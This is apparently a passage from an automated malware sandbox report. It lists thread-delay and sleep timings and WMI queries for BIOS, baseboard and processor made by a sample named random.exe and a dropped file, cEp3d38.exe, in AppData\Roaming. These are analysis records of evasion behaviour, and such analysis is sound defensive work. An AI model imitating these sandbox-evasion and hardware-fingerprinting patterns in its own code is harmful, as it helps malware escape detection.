                    Source: C:\Users\user\Desktop\random.exe | Window / User API: threadDelayed 7261
                    Source: C:\Users\user\Desktop\random.exe | Window / User API: threadDelayed 2271
                    Source: C:\Users\user\Desktop\random.exe | Window / User API: threadDelayed 7543
                    Source: C:\Users\user\Desktop\random.exe | Window / User API: threadDelayed 4906
                    Source: C:\Users\user\Desktop\random.exe | Window / User API: threadDelayed 4902
                    Source: C:\Users\user\Desktop\random.exe | Window / User API: threadDelayed 1646
                    Source: C:\Users\user\Desktop\random.exe | Window / User API: threadDelayed 431
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | Window / User API: threadDelayed 1454
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -35048813740048126s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -39830s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -39705s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -39580s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -39455s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -39330s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -39205s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -39080s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -38955s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -38829s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -38705s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -38580s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -38455s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -38330s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -38165s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -37911s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -37798s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -37673s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -37549s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -37423s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -37298s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -37173s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -37048s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -36923s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -36798s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -36673s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -36548s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -36423s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -36298s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -36173s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -36048s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -35923s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -35799s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -35673s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -35548s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -35376s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -35252s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -35080s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -34935s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -34830s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -34705s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -34580s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -34455s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -34330s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -34205s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -34080s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -33955s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -33830s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -33705s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -33580s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -33455s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -33330s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 3920 | Thread sleep time: -33205s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -32281802128991695s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -39830s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -39705s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -39580s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -39455s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -39330s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -39205s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -39080s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -38955s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -38814s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -38689s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -38564s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -38439s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -38314s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -38189s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -38064s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -37939s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -37802s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -37674s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -37549s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -37424s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -37299s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -37174s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -37049s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -36924s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -36799s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -36674s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -36549s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -36424s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -36299s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -36174s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -35297s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -35174s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -35049s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -34924s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -34799s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -34674s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -34548s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -34424s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -34299s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -34174s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -34049s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -33924s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -33799s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -33674s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -33549s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -33424s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -33299s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -32406s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -32298s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 1820 | Thread sleep time: -32174s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -33204139332677172s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -39830s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -39689s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -39340s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -39196s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -39066s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -38939s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -38814s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -38689s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -38564s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -38439s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -38314s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -38189s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -38064s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -37939s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -37814s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -37689s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -37564s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -37439s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -37314s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -37189s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -37064s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -36939s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -36814s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -36689s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -36568s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -36439s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -36314s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -36189s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -36064s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -35939s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -35814s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -35689s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -35564s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -35439s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -35314s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -35189s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -35064s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -34939s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -34814s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -34689s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -34564s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -34439s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -34314s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -34189s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -34064s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -33939s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -33814s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -33657s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -33544s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -33435s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 4680 | Thread sleep time: -33324s >= -30000s
                    Source: C:\Users\user\Desktop\random.exe TID: 5244Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 5244Thread sleep time: -39830s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 6600Thread sleep count: 1646 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 6600Thread sleep count: 431 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 5244Thread sleep time: -39703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 5244Thread sleep time: -39578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 5244Thread sleep time: -39469s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 5244Thread sleep time: -39346s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 5244Thread sleep time: -39221s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 5244Thread sleep time: -39096s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 5244Thread sleep time: -38920s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 5244Thread sleep time: -38721s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 5244Thread sleep time: -38451s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 5244Thread sleep time: -38345s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 5244Thread sleep time: -38221s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 5244Thread sleep time: -38096s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1020Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1020Thread sleep time: -39830s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1020Thread sleep time: -39690s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1144Thread sleep count: 1454 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1144Thread sleep count: 227 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1020Thread sleep time: -39565s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1020Thread sleep time: -39449s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1020Thread sleep time: -39323s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1020Thread sleep time: -39098s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1020Thread sleep time: -38979s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1020Thread sleep time: -38860s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1020Thread sleep time: -38608s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1020Thread sleep time: -38502s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1020Thread sleep time: -38377s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1020Thread sleep time: -38252s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\random.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\Desktop\random.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\random.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\random.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 39830
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 39705
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 39580
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 39455
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 39330
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 39205
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 39080
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 38955
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 38829
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 38705
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 38580
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 38455
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 38330
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 38165
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 37911
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 37798
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 37673
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 37549
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 37423
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 37298
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 37173
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 37048
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 36923
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 36798
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 36673
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 36548
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 36423
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 36298
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 36173
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 36048
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 35923
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 35799
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 35673
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 35548
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 35376
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 35252
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 35080
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 34935
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 34830
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 34705
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 34580
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 34455
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 34330
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 34205
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 34080
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 33955
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 33830
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 33705
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 33580
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 33455
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 33330
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 33205
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 39830
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 39705
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 39580
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 39455
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 39330
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 39205
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 39080
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 38955
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 38814
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 38689
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 38564
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 38439
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 38314
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 38189
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 38064
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 37939
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 37802
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 37674
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 37549
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 37424
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 37299
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 37174
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 37049
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 36924
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 36799
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 36674
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 36549
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 36424
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 36299
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 36174
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 35297
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 35174
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 35049
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 34924
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 34799
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 34674
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 34548
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 34424
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 34299
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 34174
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 34049
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 33924
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 33799
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 33674
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 33549
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 33424
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 33299
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 32406
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 32298
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 32174
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 39830
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 39689
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 39340
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 39196
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 39066
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 38939
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 38814
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 38689
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 38564
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 38439
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 38314
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 38189
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 38064
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 37939
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 37814
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 37689
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 37564
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 37439
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 37314
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 37189
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 37064
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 36939
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 36814
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 36689
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 36568
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 36439
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 36314
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 36189
